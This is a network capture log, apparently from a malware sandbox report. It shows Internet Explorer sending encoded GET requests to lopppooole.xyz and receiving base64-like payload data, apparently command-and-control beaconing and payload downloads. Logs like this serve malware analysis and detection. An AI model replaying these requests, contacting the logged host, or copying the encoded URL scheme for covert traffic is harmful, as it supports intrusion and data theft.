Jan 19, 2021 12:13:02.027578115 CET	10308	IN	Data Raw: 69 74 49 52 65 44 4c 57 5a 67 36 73 35 49 4b 74 30 56 4a 56 30 31 4d 54 6d 4d 4f 73 33 79 75 49 79 6a 4c 59 59 38 73 35 66 41 4a 54 61 37 2b 6c 5a 61 61 54 42 37 39 37 52 6d 4a 6a 48 43 2f 50 4e 4d 33 42 71 6c 72 53 67 69 33 51 44 4f 4f 79 30 52 Data Ascii: itIReDLWZg6s5IKt0VJV01MTmMOs3yuIyjLYY8s5fAJTa7+lZaaTB797RmJjHC/PNM3BqlrSgi3QDOOy0RxXIKWK6cqD4iKluQs3saeTdq393vXbjgtOFwiOieblvU1ECYUyWjb4L+ic8NWx+zHM+noMZg8g3HmYVozUlcTZM9FvEcgyc3eL7CdbJ8bT0uy7bGCdkSd+0SGDhqn8EKiU2igJs0bULLCQpQPCltlUXZkcd9jHqMl
Jan 19, 2021 12:13:02.027628899 CET	10309	IN	Data Raw: 63 46 44 53 5a 39 6d 38 4a 34 4c 39 72 31 45 36 7a 65 2f 32 64 4f 34 42 6d 62 4d 6d 4a 73 6c 37 4d 39 5a 43 6e 77 47 63 2f 31 75 73 46 4b 49 58 51 32 67 46 71 4a 75 2f 51 4b 4d 70 68 77 61 33 69 47 49 34 75 5a 35 44 2f 70 71 6a 51 59 53 31 67 79 Data Ascii: cFDSZ9m8J4L9r1E6ze/2dO4BmbMmJsl7M9ZCnwGc/1usFKIXQ2gFqJu/QKMphwa3iGI4uZ5D/pqjQYS1gyqizWwDPLPelkCW0FJDpstheLTgQjP4UhLxLZDfHBsvOVkegmDSciIG6/lD0QXtRgD3D5nnU0zFCVmFgYuUCvaC6z9e3d6hCIIYfgQntNovyUHi/4HWQhKfCcNuj1t1oqHKfghzhgj1Pa5b9nnGsU9IXfPdmG5o0xS
Jan 19, 2021 12:13:02.027688980 CET	10310	IN	Data Raw: 54 78 56 7a 4a 53 36 48 44 65 74 36 73 79 50 48 4e 57 77 64 69 76 67 2f 67 59 44 79 49 47 4a 7a 4b 74 63 6c 76 6e 30 43 4f 47 38 6a 31 70 78 36 53 31 6a 4b 65 6c 30 35 75 75 62 44 39 5a 44 4f 6c 6d 45 4a 2f 79 6f 47 2b 73 71 53 46 77 69 7a 7a 4f Data Ascii: TxVzJS6HDet6syPHNWwdivg/gYDyIGJzKtclvn0COG8j1px6S1jKel05uubD9ZDOlmEJ/yoG+sqSFwizzO7ns42XcEqOSPuXVo77RSDtDb9XaLlZbGYokWu8SPiJSnYO6FCFd0/AmW4TJoXSh79ywouWB0nYb7o02uBIzckHmmdDNBRVqfSQMT68r0yM7+KiRcTi0JKY10tbMaPNVgFSJ0aMc+4WUvWSEwzjMPZI/2fSBbGd7SY
Jan 19, 2021 12:13:02.027759075 CET	10312	IN	Data Raw: 45 69 33 79 70 79 78 69 73 76 68 71 30 44 4c 6b 61 4f 75 72 38 4b 52 77 4d 72 42 51 59 4c 62 74 67 6c 50 37 6b 37 58 37 36 7a 71 51 2b 41 74 45 75 76 76 7a 46 73 73 52 62 35 67 58 2b 71 58 4d 73 64 2b 38 72 47 78 68 76 38 62 74 61 34 36 36 59 37 Data Ascii: Ei3ypyxisvhq0DLkaOur8KRwMrBQYLbtglP7k7X76zqQ+AtEuvvzFssRb5gX+qXMsd+8rGxhv8bta466Y70Uc2apBK/O460kV33sXhDYCVUEAOeyCHaUymouFbIc9r6SiO7DRis3avjKGSwBENGpFS8WJeTh3wYD630cn9pSdQH4xW1+uUj/ryVVVVczi1QAUodlFwOdHXIdIemxa4vZGP/SK4kK3WCs0Zc8gKghQohPwQQDGJm
Jan 19, 2021 12:13:02.073671103 CET	10313	IN	Data Raw: 59 6f 61 4d 57 78 59 46 77 32 4f 6a 35 64 69 79 5a 56 4e 4e 50 77 73 49 72 56 2f 36 6b 49 6b 68 49 41 34 39 75 6f 4e 6d 4b 45 6c 73 44 4d 30 55 39 57 30 50 6a 31 4b 42 32 69 50 30 61 66 38 6c 6b 4c 50 30 4a 79 5a 70 6d 4a 6b 62 76 37 41 74 75 7a Data Ascii: YoaMWxYFw2Oj5diyZVNNPwsIrV/6kIkhIA49uoNmKElsDM0U9W0Pj1KB2iP0af8lkLP0JyZpmJkbv7AtuzpOto9VCfNnfMLineY5RpykRA7nad5i2M3nkNqpq0alQHbiTfE5ebzEoQB+3wjQmTAuNdRxTxd6I9XF/o+wzm90f93hkdU96MfyP+CNAdjSiwiuRPimPHe01t7T6eD9DmTlbCZkMlJOlU2APokQOHEpvVNNL4fRyOI
Jan 19, 2021 12:13:02.356360912 CET	10541	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: lopppooole.xyz Connection: Keep-Alive Cookie: PHPSESSID=rs7eiful1fouqitmbglbv8teg2; lang=en
Jan 19, 2021 12:13:02.402982950 CET	10542	IN	HTTP/1.1 200 OK Date: Tue, 19 Jan 2021 11:13:02 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Wed, 16 Dec 2020 20:14:32 GMT ETag: "1536-5b69a85f21533" Accept-Ranges: bytes Content-Length: 5430 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/vnd.microsoft.icon Data Raw: 00 00 01 00 02 00 10 10 00 00 00 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 00 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 87 73 f7 9c 87 73 f9 9c 87 73 f7 9c 87 73 77 9c 87 72 03 ff ff ff 01 9c 87 73 09 9c 87 73 0f 9c 87 73 0d 9b 87 73 05 ff ff ff 01 9c 87 73 15 9c 87 73 c7 9c 87 73 f9 9c 87 73 f9 9c 87 73 85 9c 87 73 f9 9c 87 72 f9 9c 87 73 7b 9c 87 73 05 9c 87 73 23 9c 87 73 7f 9c 87 73 c3 9b 87 72 d3 9c 87 73 cf 9c 87 73 ad 9c 87 73 5b 9c 87 73 0d 9c 87 73 1b 9c 87 73 c5 9b 87 73 ff 9c 87 73 85 9c 87 73 f7 9c 87 73 7d 9c 87 73 07 9c 87 73 57 9c 87 72 db 9c 87 73 ab 9c 87 73 6d 9c 87 73 4b 9c 87 73 43 9c 87 73 77 9c 87 73 cf 9c 87 73 b7 9b 86 73 25 9c 87 73 21 9c 87 73 cb 9c 87 73 87 9c 87 73 7f 9c 87 73 05 9c 87 73 55 9c 87 73 e1 9c 87 73 59 9c 87 73 81 9c 87 73 df 9c 87 73 c9 9b 86 72 23 ff ff ff 01 9c 87 73 13 9c 87 73 97 9c 87 73 cd 9c 87 73 19 9c 87 72 25 9c 87 73 5b 9c 87 73 03 9c 87 73 1d 9c 87 73 d9 9c 87 73 5d 9c 87 73 0b 9b 87 72 ef 9c 87 73 53 9b 87 73 bf 9c 87 73 71 ff ff ff 01 ff ff ff 01 9c 87 73 0b 9c 87 73 a5 9c 87 73 95 9c 87 73 03 9c 87 73 03 ff ff ff 01 9c 87 73 75 9c 87 73 b5 9c 87 73 07 ff ff ff 01 9c 87 73 c1 9c 87 73 db 9c 87 73 e7 9c 87 73 41 ff ff ff 01 ff ff ff 01 ff ff ff 01 9c 86 73 25 9b 87 73 d9 9c 87 73 23 ff ff ff 01 9c 87 72 07 9c 87 72 bb 9c 87 73 5d ff ff ff 01 ff ff ff 01 9c 87 73 1b 9c 87 73 db 9c 87 73 6b 9c 87 73 03 9c 87 73 03 ff ff ff 01 ff ff ff 01 9c 87 73 03 9c 87 73 af 9c 87 73 5d ff ff ff 01 9c 87 73 0d 9c 87 72 cd 9c 87 73 37 ff ff ff 01 ff ff ff 01 9c 86 73 09 9c 87 73 c9 9c 87 72 91 9c 86 72 a3 9c 87 73 81 9c 86 72 05 ff ff ff 01 ff ff ff 01 9b 87 73 85 9c 87 73 7f ff ff ff 01 9c 87 73 0d 9c 87 73 cb 9b 87 73 37 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 69 9c 87 73 3f 9c 87 73 37 9c 87 73 13 ff ff ff 01 ff ff ff 01 9b 87 73 83 9c 87 73 7f ff ff ff 01 9c 87 73 07 9c 87 73 b9 9c 87 72 57 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 c9 9c 87 73 97 9c 87 73 a9 9c 87 73 a9 9c 87 73 97 ff ff ff 01 ff ff ff 01 9c 87 73 ab 9c 87 73 5b ff ff ff 01 ff ff ff 01 9c 87 73 73 9c 87 73 ad 9c 87 73 05 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 6d 9c 87 73 49 9c 87 73 3b 9c 87 73 07 ff ff ff 01 9c 87 73 21 9c 87 73 d3 9c 87 73 23 ff ff ff 01 9c 87 73 05 9c 87 73 1b 9b 87 73 d3 9c 87 73 51 ff ff ff 01 9b 86 73 09 9c 87 73 cb 9c 87 73 89 9b 87 72 83 9c 87 73 6d 9c 87 73 05 9c 87 72 07 9c 87 73 97 9b 87 72 91 9c 87 73 03 9c 87 73 05 9b 87 72 89 9c 87 73 07 9c 87 73 51 9c 87 73 d9 9c 87 72 4b 9c 87 73 07 9c 87 73 67 9c 86 73 27 ff ff ff 01 ff ff ff 01 9b 86 73 0d 9c 87 73 81 9c 87 73 c5 9c 87 73 17 9c 87 73 27 9c 87 73 5f 9c 87 73 f7 9c 87 73 85 9c 87 73 09 9b 87 72 51 9c 87 73 d3 9c 87 73 9d 9c 87 73 4b 9c 86 72 2f 9c 87 73 33 9c 87 73 61 9c 87 73 bd 9b 87 73 b1 9c 87 73 21 9c 87 73 23 9c 87 73 cd 9c 87 73 87 9c 87 73 f9 9c 86 73 f9 9c 87 73 83 9c 87 73 07 9c 87 73 1f 9c 87 73 79 9c 87 73 b9 9c 87 72 c5 9c 87 73 c3 9c 87 72 a7 9c 87 73 55 9c 87 72 0b 9c 87 73 1d 9c Data Ascii: h& ( @sssswrssssssssssrs{ss#ssrsss[sssssss}ssWrssmsKsCswsss%s!sssssUssYsssr#ssssr%s[ssss]srsSssqssssssussssssAs%ss#rrs]sssksssss]srs7ssrrsrsssss7sssis?s7sssssrWssssssss[sssssssmsIs;ss!ss#ssssQsssrsmsrsrssrssQsrKssgs'sssss's_sssrQsssKr/s3sasss!s#ssssssssysrsrsUrs

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49767	185.186.244.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 19, 2021 12:13:04.112971067 CET	10548	OUT	GET /manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiwsAXb_2FQL/BI0B_2BEHYbzkri/CVbt6Ud3hbu6juyQ39/_2FdPSw_2/FAhy67XuasfNyAs2fp_2/FWN1bdwTDPIYYGwfcgE/MI3f3RUzobEk8E33KaQBi_/2BX59YotVm2s8/5lk6oUdX/LH2keW.cnx HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: lopppooole.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=rs7eiful1fouqitmbglbv8teg2
Jan 19, 2021 12:13:04.191454887 CET	10550	IN	HTTP/1.1 200 OK Date: Tue, 19 Jan 2021 11:13:04 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 38 35 61 63 0d 0a 4e 67 69 5a 2b 45 75 7a 76 56 38 44 6b 36 4b 67 4c 38 4e 4c 30 41 42 31 43 4c 57 74 6f 38 65 59 63 36 43 63 33 36 4d 6a 4d 46 53 49 44 57 56 4a 53 69 63 55 62 36 4b 5a 2f 66 39 31 49 4a 2f 43 6c 68 4e 65 42 32 2f 58 57 31 50 38 72 77 37 51 34 43 61 50 72 49 51 54 52 41 42 35 4f 38 38 34 38 4d 30 32 57 53 6a 6c 77 4d 47 68 46 56 41 66 6c 44 50 31 64 59 7a 4e 34 54 66 74 42 52 6e 4e 6c 30 63 54 4e 6a 70 71 42 77 6d 79 68 4c 62 4c 31 37 63 54 66 44 7a 69 73 36 54 72 6a 42 4e 69 4f 51 56 51 67 46 34 30 4d 55 68 43 6f 35 34 72 49 55 77 4a 51 44 36 44 74 78 49 34 48 6a 4c 48 35 4c 6f 33 50 45 77 6a 70 46 77 67 6d 5a 32 4f 31 64 61 72 54 79 4b 4a 49 37 50 6a 71 59 4d 7a 65 49 4c 4d 70 76 62 70 69 53 58 56 33 4c 75 33 50 55 33 42 78 53 31 47 4b 39 34 77 36 55 74 68 37 76 2b 4c 4c 36 50 2b 71 63 51 4f 46 42 77 36 53 2f 51 44 75 4d 4d 78 6d 46 34 75 59 62 38 64 2b 78 31 6b 6c 42 43 73 31 77 6f 42 5a 32 49 43 46 66 5a 70 44 51 39 6a 73 4d 72 65 7a 62 46 73 62 6d 65 6b 32 67 52 67 68 4e 59 31 65 51 4e 31 4e 52 2b 2f 6e 38 51 49 6c 55 46 6b 31 6a 55 2f 4e 44 2b 4a 33 38 45 77 4f 35 59 4a 4f 6c 35 4f 51 5a 48 6e 49 55 75 6f 79 45 43 63 6c 78 54 65 67 65 70 37 58 35 65 70 73 31 35 5a 6d 4c 79 52 53 77 59 33 5a 39 46 6b 46 49 72 4b 64 54 5a 36 6e 73 53 71 70 64 77 5a 31 4b 7a 56 6b 64 34 6d 58 55 72 42 70 4e 65 66 2f 57 37 46 50 64 68 63 77 73 46 6d 4a 7a 43 4c 75 35 39 58 6c 58 2f 73 6d 70 36 6d 4a 38 43 73 31 55 45 41 79 61 33 54 49 6e 71 66 4a 67 41 79 39 47 38 62 39 39 49 70 55 41 7a 68 4d 66 38 79 4f 68 57 74 74 35 38 74 50 2f 59 76 75 35 34 50 78 4e 45 5a 71 6a 4d 46 39 34 65 48 55 4e 41 70 4f 58 4d 33 78 6b 63 4a 44 6e 47 4c 78 32 38 7a 6b 5a 6a 69 30 62 6a 6a 79 4b 59 4c 31 6e 2f 32 4e 75 48 44 5a 57 5a 47 70 41 4e 57 63 50 71 67 46 4f 67 67 6f 79 54 51 77 34 57 57 52 69 6a 6c 59 52 72 31 78 45 4a 63 38 46 65 73 30 41 48 64 70 6d 7a 31 2b 47 48 68 63 50 6e 65 71 76 38 69 79 76 39 46 71 44 78 42 50 4f 4f 53 32 71 49 70 63 56 4c 77 43 50 62 71 2f 33 75 71 69 4e 36 6b 2f 4f 4c 45 63 2f 33 72 62 75 4f 6a 74 37 38 33 36 65 50 34 34 66 56 66 73 76 35 64 75 77 43 42 36 5a 6f 54 78 34 44 31 56 45 37 64 6e 4c 49 46 32 54 49 73 4d 47 4a 75 5a 4d 49 46 39 65 58 38 71 6e 55 6b 59 6e 4c 42 79 61 6d 48 7a 4e 38 71 41 36 77 59 75 51 2b 54 56 73 2f 39 62 4c 48 4f 66 55 4c 52 77 36 55 73 46 51 4f 77 78 56 7a 36 71 79 47 66 48 31 51 64 31 57 36 71 76 45 53 66 69 62 4a 6a 79 72 30 55 4a 45 42 61 2b 7a 4d 57 38 6f 4d 31 4c 55 49 4c 2b 7a 58 2b 6a 63 44 4b 42 69 6d 4b 4d 41 72 45 38 73 6b 49 7a 2b 43 58 48 64 78 4f 65 53 75 37 51 44 59 78 2b 31 34 6c 56 6b 76 66 31 75 4b 61 50 74 4b 48 70 70 51 4c 6b 59 72 56 46 37 42 37 6b 76 66 30 2f 6b 62 4e 67 54 57 4d 6d 6e 69 39 55 4c 32 59 75 50 5a 58 61 36 52 48 79 4b 7a 67 71 54 49 72 71 4f 65 32 2b 75 77 7a 56 36 66 75 45 43 6f 67 33 6a 59 6a 76 63 4f 4b 32 57 50 57 2f 74 Data Ascii: 485acNgiZ+EuzvV8Dk6KgL8NL0AB1CLWto8eYc6Cc36MjMFSIDWVJSicUb6KZ/f91IJ/ClhNeB2/XW1P8rw7Q4CaPrIQTRAB5O8848M02WSjlwMGhFVAflDP1dYzN4TftBRnNl0cTNjpqBwmyhLbL17cTfDzis6TrjBNiOQVQgF40MUhCo54rIUwJQD6DtxI4HjLH5Lo3PEwjpFwgmZ2O1darTyKJI7PjqYMzeILMpvbpiSXV3Lu3PU3BxS1GK94w6Uth7v+LL6P+qcQOFBw6S/QDuMMxmF4uYb8d+x1klBCs1woBZ2ICFfZpDQ9jsMrezbFsbmek2gRghNY1eQN1NR+/n8QIlUFk1jU/ND+J38EwO5YJOl5OQZHnIUuoyECclxTegep7X5eps15ZmLyRSwY3Z9FkFIrKdTZ6nsSqpdwZ1KzVkd4mXUrBpNef/W7FPdhcwsFmJzCLu59XlX/smp6mJ8Cs1UEAya3TInqfJgAy9G8b99IpUAzhMf8yOhWtt58tP/Yvu54PxNEZqjMF94eHUNApOXM3xkcJDnGLx28zkZji0bjjyKYL1n/2NuHDZWZGpANWcPqgFOggoyTQw4WWRijlYRr1xEJc8Fes0AHdpmz1+GHhcPneqv8iyv9FqDxBPOOS2qIpcVLwCPbq/3uqiN6k/OLEc/3rbuOjt7836eP44fVfsv5duwCB6ZoTx4D1VE7dnLIF2TIsMGJuZMIF9eX8qnUkYnLByamHzN8qA6wYuQ+TVs/9bLHOfULRw6UsFQOwxVz6qyGfH1Qd1W6qvESfibJjyr0UJEBa+zMW8oM1LUIL+zX+jcDKBimKMArE8skIz+CXHdxOeSu7QDYx+14lVkvf1uKaPtKHppQLkYrVF7B7kvf0/kbNgTWMmni9UL2YuPZXa6RHyKzgqTIrqOe2+uwzV6fuECog3jYjvcOK2WPW/t
Jan 19, 2021 12:13:04.191514015 CET	10551	IN	Data Raw: 35 55 67 54 71 76 78 4b 4d 51 35 37 46 6e 76 66 50 32 32 35 2b 5a 7a 4d 66 2f 6e 4a 30 4d 46 4a 76 58 57 59 78 51 44 35 50 6e 5a 79 49 63 39 64 30 67 6c 47 6c 70 7a 66 2b 38 56 47 6c 39 52 4a 6f 75 78 35 66 34 75 71 48 67 70 30 55 35 64 43 6e 47 Data Ascii: 5UgTqvxKMQ57FnvfP225+ZzMf/nJ0MFJvXWYxQD5PnZyIc9d0glGlpzf+8VGl9RJoux5f4uqHgp0U5dCnG/uV7S1XySQj0soVWAMwyK9Z8dp4jxYZ9Scg6koSDiAtVO4jWW8IS3Y/CByNTEZQ6QFZFyTUT/IJJW/Hobwp9pORRvQYM/NP2CF/EHKddetW9g2eGM9r034vynNN5yuxyw1gMORZH44xWTH1UbmoAHW3Gb1cJgNlI+
Jan 19, 2021 12:13:04.191555023 CET	10553	IN	Data Raw: 61 73 32 51 37 6c 50 55 2f 30 62 4f 57 46 30 79 70 6e 4d 57 6a 54 38 7a 78 69 79 64 39 63 7a 46 57 2f 76 6b 4e 56 66 51 67 64 31 47 42 55 78 6b 6b 64 36 77 76 72 75 66 37 32 71 35 6f 63 35 6a 6f 66 62 6b 4d 43 63 2f 48 62 41 76 56 49 74 30 36 4f Data Ascii: as2Q7lPU/0bOWF0ypnMWjT8zxiyd9czFW/vkNVfQgd1GBUxkkd6wvruf72q5oc5jofbkMCc/HbAvVIt06OBFqHYy78Nh9h2t6b9LMlocbgZOJMZxgJf065OnVaZ02SHLDDTkMOCZKiCD02DsJ8Y48Ebsh6wzmR9isjQiqVTBlSzj85qjzKjk2PY7KNhler/eDV6GmM6JMvWtO0McTaumv0lmzCcUXm/kZTIkPRAAMfDQM5v5ckl
Jan 19, 2021 12:13:04.191586018 CET	10554	IN	Data Raw: 78 41 41 36 32 7a 2b 65 6e 73 33 34 74 37 42 46 4b 6b 47 30 6d 36 51 46 59 57 46 57 4c 35 64 4f 4b 42 79 33 37 50 6a 35 52 30 32 33 66 67 4a 64 77 41 77 64 75 48 52 57 4d 39 30 58 35 62 6f 36 4a 35 7a 4d 6c 59 71 4c 31 4c 6a 67 4b 6a 44 48 65 34 Data Ascii: xAA62z+ens34t7BFKkG0m6QFYWFWL5dOKBy37Pj5R023fgJdwAwduHRWM90X5bo6J5zMlYqL1LjgKjDHe4lAe4KF0tI9pILmqOSVyGdFx32LiC4KmytcVraxLhRJwD2mJLyItTV6s/qwV3Lc42LiTAuhxkZiiLU6Zs6ILSTzyNLtuInAWId29S2jNtLLjyem7Fpd5dHFQI9pDX3ZZz6QlCM4HztIbz4YUKhuCrDbRE8YUpknSxN
Jan 19, 2021 12:13:04.191615105 CET	10555	IN	Data Raw: 74 6b 42 74 61 2b 2f 34 2f 6d 39 54 47 6a 38 4a 6b 57 4d 42 6a 52 39 78 61 33 6b 44 6f 63 75 52 56 36 6b 45 30 38 59 58 47 4a 52 71 67 32 52 35 51 35 7a 41 32 57 6e 4a 4f 51 6e 36 5a 47 57 4e 54 76 4e 61 6d 41 64 52 69 4b 2f 43 55 49 70 2f 51 51 Data Ascii: tkBta+/4/m9TGj8JkWMBjR9xa3kDocuRV6kE08YXGJRqg2R5Q5zA2WnJOQn6ZGWNTvNamAdRiK/CUIp/QQvB9Mig7E0iWKfkF/VY/rOzcrAxtgV5XilRyFawHWDCrK4BnUq+P37VMQGqNb1B87v6fxt1/RkqQFU9Q1zFbSepRIu34MhiDpZOnEBeTwAvzHEmMRk7anss2Psrfk12R4cy6RQBIyk/EcFE0tp+uAqBsh5LmQX4FXQ
Jan 19, 2021 12:13:04.191647053 CET	10557	IN	Data Raw: 35 41 6b 31 39 53 34 6d 53 49 30 39 63 6f 4f 64 69 32 71 66 38 62 2f 68 68 57 6a 52 76 47 5a 44 4f 32 79 4c 58 55 46 66 2f 4e 6a 6f 76 32 37 2b 65 66 61 4d 7a 78 42 55 6d 66 56 52 30 75 37 66 42 34 56 4e 37 35 4d 67 42 34 43 30 63 64 53 39 62 39 Data Ascii: 5Ak19S4mSI09coOdi2qf8b/hhWjRvGZDO2yLXUFf/Njov27+efaMzxBUmfVR0u7fB4VN75MgB4C0cdS9b9GkKXuz4DjUCxhR2haWJBPA4QAhJS0kqmh28k8jL/Ggw30eqEKk5GkYV3rjfRz1dhKwfvViOQB8doIsefLysVMDf4fU155o7XDwGeQJuXPt7V67OjAm8XS54Y2aPecpXO5rvFcV0TMbJDvO36wRUiOVSEYf5E7dFeC
Jan 19, 2021 12:13:04.191677094 CET	10558	IN	Data Raw: 76 79 76 71 56 6e 4d 73 78 62 4f 6d 70 51 6a 68 48 63 71 74 30 6e 64 46 6d 6c 64 39 38 43 67 31 58 66 41 43 42 6b 34 4a 39 2b 72 65 34 67 6b 38 54 36 71 4c 2f 33 59 35 6b 67 56 31 71 48 47 41 53 53 6b 4f 4f 37 55 4d 61 55 36 34 30 69 4c 49 36 4b Data Ascii: vyvqVnMsxbOmpQjhHcqt0ndFmld98Cg1XfACBk4J9+re4gk8T6qL/3Y5kgV1qHGASSkOO7UMaU640iLI6KyqQMJVLabkyXlojyMPodCo6QgWuXnKADawsZosbdt6pQ09GqjgnaCdExKP+Mmygyd9KrNnDXBiSXCsi2b4axe02d0Xo2qRDmWsqSlpQgL6nSP9+oqbPrw5XnJtjPGWGtazwtN5Br1m3aDjtQdM2JdcxymkSguyJEG
Jan 19, 2021 12:13:04.191720009 CET	10559	IN	Data Raw: 77 66 34 6d 38 55 4a 77 36 44 61 2b 66 7a 6c 33 61 34 6f 56 2b 43 6a 68 37 46 73 54 4d 59 5a 57 4d 72 32 36 72 35 5a 6e 69 47 50 70 6d 47 47 54 61 73 68 46 43 59 41 6c 52 50 4b 62 67 37 66 45 4a 39 4e 34 38 54 55 6e 69 39 6e 51 35 72 34 6c 35 57 Data Ascii: wf4m8UJw6Da+fzl3a4oV+Cjh7FsTMYZWMr26r5ZniGPpmGGTashFCYAlRPKbg7fEJ9N48TUni9nQ5r4l5Wp5EcECr+Iz5G+z0rK6RWBueluqiMqNqB5l5i03Q/l08azOHt7ac1gLR4T+CkG4NrkB1T8mOxe+5gC2KYKJ9Y8NBy9A1J80CEt/aVe0ZXNBYwo22d5GtMVQoV9gam3bfoeAxi5dPcxVFD+5VFmjsRSUa/RmIvmQWGx
Jan 19, 2021 12:13:04.191759109 CET	10561	IN	Data Raw: 4f 73 4e 6b 79 45 67 4c 51 38 59 39 43 4b 6f 48 6f 36 62 37 5a 2b 73 36 39 44 42 50 44 43 62 6d 42 59 34 48 47 62 2b 6b 6d 67 43 51 37 72 73 76 4e 34 2b 2f 68 46 53 58 41 38 43 43 67 4b 63 51 42 47 61 33 77 49 51 51 63 41 49 71 78 50 41 37 6f 56 Data Ascii: OsNkyEgLQ8Y9CKoHo6b7Z+s69DBPDCbmBY4HGb+kmgCQ7rsvN4+/hFSXA8CCgKcQBGa3wIQQcAIqxPA7oVAJ3p6OAd7uErGXIFM9OlpIwMcP27foLWOZre5Et3pBhl5qwO8gj5QisKsayWrd2vYhzM+Ei/enJQqVwgrj4R7XC46MMhVYX95i1XGDXORLploBBKM3tFrRBMAcEdfaBOFqaAYCpVft7G7YJ5mK6hYW40chv3E/VJA
Jan 19, 2021 12:13:04.191795111 CET	10562	IN	Data Raw: 47 6c 39 49 56 46 61 57 72 45 30 52 70 70 73 67 75 5a 33 62 79 67 54 44 32 31 75 63 4a 79 53 49 6a 54 58 37 58 44 54 7a 6b 79 45 49 62 36 61 63 4b 32 34 45 6e 46 48 37 50 4e 4b 47 77 4d 55 54 75 45 45 7a 56 4b 37 4a 63 6b 71 5a 4c 4f 79 50 61 45 Data Ascii: Gl9IVFaWrE0RppsguZ3bygTD21ucJySIjTX7XDTzkyEIb6acK24EnFH7PNKGwMUTuEEzVK7JckqZLOyPaEiWZnkkjSC0dlhKdwrkxrK0xx5y78wVZdtjRcSpUFukyA/3Irb7py6IZ5QcSZkPxZhwBfND9Q+eyK/Xmu7xhrapRA4JcXLDa4nUVHtd/bj3GSlDD2+WGW9f4Qv+VsxrnadREbX1GeS6ZRi637Ti+arW7pXM7zToREy
Jan 19, 2021 12:13:04.238148928 CET	10564	IN	Data Raw: 6a 65 39 6f 76 48 39 53 64 37 6c 2b 4b 69 68 4e 4e 45 61 4c 2f 79 44 6e 46 38 30 64 4a 61 48 34 69 70 75 79 68 63 62 59 77 63 57 56 71 69 6c 74 56 36 55 4a 31 49 41 73 49 54 38 64 66 6b 68 50 73 79 54 63 56 6b 6d 72 6a 41 50 49 57 63 79 7a 35 39 Data Ascii: je9ovH9Sd7l+KihNNEaL/yDnF80dJaH4ipuyhcbYwcWVqiltV6UJ1IAsIT8dfkhPsyTcVkmrjAPIWcyz595Cy4utnIH3HepM918B72cE17CiJ4bT5jdAnkqBahlySudce3uUTI+ZztBE3XIT3wFgoD34MptWGQVzHLXZoUfxYD5MxkLPfAaSC/ba+mcNQzaYFkRJREvCqKcfLhmfoF2kdOPKWom8vZ2o6F3YBkM6Q/ZHZXOy/b2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49769	185.186.244.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 19, 2021 12:13:06.343535900 CET	10857	OUT	GET /manifest/kCTdQ_2BVGuRh3/WFBmy05TUuAn4xtP9_2FP/3n_2FnxuIWQ3b206/ecbDlimfQBclFip/FJAwdVz_2B9TFd3nBh/UoR5h5TF0/yDm4Cf1AP8eKKLirBNO7/RmInQmK7NiugHEy8vMH/YJS_2FmFR3z8cT16Qz_2FU/950pqlOH2MscB/Oa5ScIjD/o2f5QwKQBtWpjzyRW_2B5nY/gM3maYjp.cnx HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: lopppooole.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=rs7eiful1fouqitmbglbv8teg2
Jan 19, 2021 12:13:06.422971010 CET	10859	IN	HTTP/1.1 200 OK Date: Tue, 19 Jan 2021 11:13:06 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2412 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 75 31 2b 32 50 68 6f 43 37 6f 41 34 50 69 57 58 35 2f 6b 64 2f 50 62 41 72 53 38 6d 68 55 54 70 38 57 78 39 51 62 75 59 6c 66 7a 68 42 63 6a 62 4c 57 68 44 2f 59 57 36 46 71 58 6b 77 6b 61 74 51 70 35 33 49 54 77 2f 52 6f 68 2b 4b 31 32 67 33 2b 53 44 58 4c 48 73 5a 67 31 6f 6e 52 70 74 71 53 36 63 4a 4e 6e 4b 4d 34 43 73 54 4b 70 30 38 59 5a 51 7a 4c 67 69 66 76 68 34 42 52 34 39 48 74 72 4b 6c 72 6c 49 74 74 62 62 65 31 53 6c 33 38 63 57 51 2b 52 36 51 30 49 6d 63 4b 51 74 32 48 46 54 43 4f 66 39 52 61 77 46 6d 35 4c 67 45 47 2f 4a 68 6e 6b 65 64 31 6d 51 6d 53 42 2b 77 44 48 69 4f 68 2b 44 45 48 6d 30 46 6b 31 49 48 6c 52 47 48 